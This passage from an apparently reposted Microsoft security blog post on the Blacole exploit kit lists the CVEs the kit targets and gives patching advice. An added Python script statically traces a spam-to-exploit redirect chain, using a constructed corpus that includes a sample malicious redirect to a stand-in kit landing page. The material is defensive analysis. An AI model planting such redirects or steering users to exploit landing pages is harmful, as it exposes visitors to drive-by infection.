  • CVE-2010-0842 - Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
  • CVE-2010-0886 - Vulnerability in the Java Deployment Toolkit component in Oracle Java SE
  • CVE-2010-1423 - Java argument injection vulnerability in the URI handler in Java NPAPI plugin
  • CVE-2010-1885 - Microsoft Help Center URL Validation Vulnerability
  • CVE-2010-3552 - Sun Java Runtime New Plugin docbase Buffer Overflow (aka "Java Skyline exploit")
  • CVE-2010-4452 - Sun Java Applet2ClassLoader Remote Code Execution Vulnerability
  • CVE-2011-2110 - Adobe Flash Player Unspecified Memory Corruption Vulnerability
  • CVE-2011-3544 - Vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier

Prevention

Protection against the Blacole exploit pack requires that your third-party applications, specifically multiple components of Oracle Java and Adobe applications, are updated to the latest available and secure versions. It is important that vulnerable versions are removed and not left installed for malware to abuse and exploit.

For personal computers, there are security applications, such as the following, that offer vulnerability scanning and can assist in identifying vulnerable installations:

And as keeping software up-to-date applies for all systems, check out "MetaQuark AppFresh" to help identify software that needs updating on Mac operating systems.

It's worth mentioning again (and without fear of being redundant!) to reduce risk against Blacole, replace insecure programs with secure versions. In conclusion, we remind you to use best practices and to use security software to promote a healthy digital ecosystem.

--Patrick Nolan, MMPC
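The walk the post describes (index.html on a compromised domain, three copies of ajaxam.js of which two are dead, one live redirect to a PHP landing script) can be reproduced without executing any of the attacker's code. The script below is an added example, not tooling from the MMPC post; it reads each hop as text and extracts where it points next. The corpus of pages, the .example hostnames and the page parameter are constructed stand-ins for the real compromised sites, and the script also handles location.replace()/assign() and relative URLs, which the post's single ajaxam.js did not need.

```python
"""Static triage of a spam-to-exploit-kit redirect chain (index.html -> ajaxam.js -> landing PHP).

Added example, not from the post. Each hop is read as text and the next hops are extracted
(script/iframe sources in HTML, location assignments in JavaScript); nothing is executed.
The corpus and the .example hostnames are constructed stand-ins for the real sites.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class SourceCollector(HTMLParser):
    """Collects external script and iframe sources from an HTML document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe") and attrs.get("src"):
            self.sources.append((tag, attrs["src"]))


# document.location = '...', window.location.href = "...", location.replace('...'), location.assign("...")
LOCATION_RE = re.compile(
    r"""(?:(?:document|window|top|self)\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
    r"""|location\.(?:replace|assign)\(\s*['"]([^'"]+)['"]\s*\)"""
)


def next_hops(url, body):
    """Return (kind, absolute_url) pairs the page or script would load next."""
    if body.lstrip().startswith("<"):  # crude content sniffing: HTML, otherwise treat as JavaScript
        collector = SourceCollector()
        collector.feed(body)
        return [(kind, urljoin(url, src)) for kind, src in collector.sources]
    return [("redirect", urljoin(url, m.group(1) or m.group(2))) for m in LOCATION_RE.finditer(body)]


def follow_chain(start, fetch, max_depth=6):
    """Breadth-first walk from `start`; `fetch(url)` returns the body text or None for a dead hop."""
    seen, chain, queue = set(), [], [("link", start, 0)]
    while queue:
        kind, url, depth = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        body = fetch(url)
        chain.append((depth, kind, url, "alive" if body is not None else "dead"))
        if body is not None and depth < max_depth:
            queue.extend((k, u, depth + 1) for k, u in next_hops(url, body))
    return chain


def hosts_involved(chain):
    """Every hostname touched by the chain, the list to hand to the abuse desk."""
    return sorted({urlparse(url).hostname for _, _, url, _ in chain})


# Constructed corpus modelled on the post: one index page, three copies of ajaxam.js (two dead),
# one landing script. Hostnames and the page parameter are placeholders.
START = "http://compromised-a.example/index.html"
CORPUS = {
    START: """<html><body>
<script type="text/javascript" src="http://compromised-b.example/ajaxam.js"></script>
<script type="text/javascript" src="http://compromised-c.example/ajaxam.js"></script>
<script type="text/javascript" src="http://compromised-d.example/ajaxam.js"></script>
</body></html>""",
    "http://compromised-b.example/ajaxam.js": None,
    "http://compromised-c.example/ajaxam.js": None,
    "http://compromised-d.example/ajaxam.js": "document.location='http://kit-host.example/main.php?page=8c6b5e9a2f';",
    "http://kit-host.example/main.php?page=8c6b5e9a2f": "/* obfuscated landing script: analysed separately, never executed here */",
}


def fetch_from_corpus(url):
    """Stand-in for an HTTP fetch from an isolated analysis box."""
    return CORPUS.get(url)


if __name__ == "__main__":
    for depth, kind, url, status in follow_chain(START, fetch_from_corpus):
        print(f"{'  ' * depth}{kind:8s} {status:5s} {url}")
    print("hosts:", hosts_involved(START and follow_chain(START, fetch_from_corpus)))
```

The walk stops at the landing script on purpose: the obfuscated stage that follows is exploit code selected by the kit, and the place to look at it is a disposable VM, not a parser.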

Categories: Microsoft, Security

Martijn's van Alles en (N)iets Website Feeds
